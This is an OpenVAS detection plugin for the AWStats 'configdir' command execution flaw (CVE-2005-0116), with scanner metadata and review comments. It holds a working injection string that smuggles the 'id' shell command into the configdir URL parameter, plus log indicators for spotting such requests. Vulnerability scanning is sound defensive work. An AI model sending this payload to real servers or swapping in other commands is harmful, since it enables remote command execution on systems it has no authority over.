openvas | Copyright (C) 2005 David Maciejak | OPENVAS:136141256231016189
History | Nov 03, 2005 - 12:00 a.m.

AWStats 'configdir' Parameter Arbitrary Command Execution Vulnerability

2005-11-03 00:00:00
Copyright (C) 2005 David Maciejak
plugins.openvas.org
5

AI Score: 6.5 Medium (Confidence: Low)

CVSS2: 7.5 High
- Access Vector: NETWORK
- Access Complexity: LOW
- Authentication: NONE
- Confidentiality Impact: PARTIAL
- Integrity Impact: PARTIAL
- Availability Impact: PARTIAL
- Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.972 High (Percentile: 99.8%)

AWStats is prone to a command execution vulnerability.

# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

# CPE identifier for AWStats; the check logic further down passes it to
# get_app_port() / get_app_location() to find the detected instance.
CPE = "cpe:/a:awstats:awstats";

# Metadata section: when the scanner loads the plugin in "description" mode it
# only registers the identifiers, references and tags below and then exits;
# none of the network checks further down run in this mode.
if(description)
{
  # Identity of the check and the vulnerability it covers.
  script_oid("1.3.6.1.4.1.25623.1.0.16189");
  script_version("2023-08-01T13:29:10+0000");
  script_cve_id("CVE-2005-0116");
  # NOTE(review): both references point at SecurityFocus BID pages over plain
  # http; these links may no longer resolve - confirm, and prefer the CVE entry.
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12270");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12298");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  # CVSSv2 base score and vector: network reachable, low complexity, no
  # authentication, partial impact on confidentiality/integrity/availability.
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("AWStats 'configdir' Parameter Arbitrary Command Execution Vulnerability");
  # ACT_ATTACK marks this as an active check: it sends a probing request to the
  # target rather than inferring the result from a version banner.
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 David Maciejak");
  script_family("Web application abuses");
  # Scheduling prerequisites: the detection plugin must have run first, and
  # the "awstats/installed" key must be present (presumably set by
  # awstats_detect.nasl - verify there) or this check is skipped.
  script_dependencies("awstats_detect.nasl");
  script_mandatory_keys("awstats/installed");

  script_tag(name:"summary", value:"AWStats is prone to a command execution vulnerability.");

  # Root cause as reported: the 'configdir' request parameter reaches
  # awstats.pl without sanitization.
  script_tag(name:"insight", value:"The remote version of this software is prone to an input
  validation vulnerability. The issue is reported to exist because user supplied 'configdir' URI
  data passed to the 'awstats.pl' script is not sanitized.");

  script_tag(name:"impact", value:"An attacker may exploit this condition to execute commands remotely or disclose
  contents of web server readable files.");

  # NOTE(review): 6.3 is the minimum release named for this CVE only; when
  # remediating, a currently supported AWStats release is the safer target -
  # confirm against the vendor's changelog.
  script_tag(name:"solution", value:"Upgrade at least to version 6.3 of this software.");

  script_tag(name:"solution_type", value:"VendorFix");
  # "remote_vul" declares that the finding comes from an active remote check
  # of the vulnerability itself, not from version matching.
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

# Locate the AWStats instance recorded by the detection plugin. If either the
# port or the install path is unknown there is nothing to test, so stop quietly.
port = get_app_port( cpe:CPE );
if( ! port )
  exit( 0 );

dir = get_app_location( cpe:CPE, port:port );
if( ! dir )
  exit( 0 );

# Active verification, delegated to the shared helper http_check_remote_code().
# check_request is the probe for awstats.pl under the detected path, and
# check_result is the pattern expected in the response: the uid=/gid= output of
# the 'id' command named in 'command'. A match therefore shows that the
# 'configdir' value reached a shell on the server.
# NOTE(review): the exact role of extra_check (looks like an additional string
# expected in the response) is defined in the helper - confirm there.
#
# Operational notes for whoever runs or triages this check:
#  - On a vulnerable host the 'id' command really executes, with the
#    privileges of the web server / CGI user.
#  - The request is recorded in the web server access log like any other hit.
#    A 'configdir=' value containing '|' or a '%00' byte in requests for
#    awstats.pl is a useful log/IDS indicator for this class of request.
http_check_remote_code( port:port,
                        unique_dir:dir,
                        check_request:"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00",
                        check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                        extra_check:"Check config file, permissions and AWStats documentation",
                        command:"id" );

# Reached only when the helper did not report a finding and exit on its own.
# Exit code 99 is presumably the feed's "target not affected" convention -
# confirm. It means this one probe did not match, which is weaker than proof
# that the installed version is patched (request filtering in front of the
# server could hide a vulnerable install).
exit( 99 );
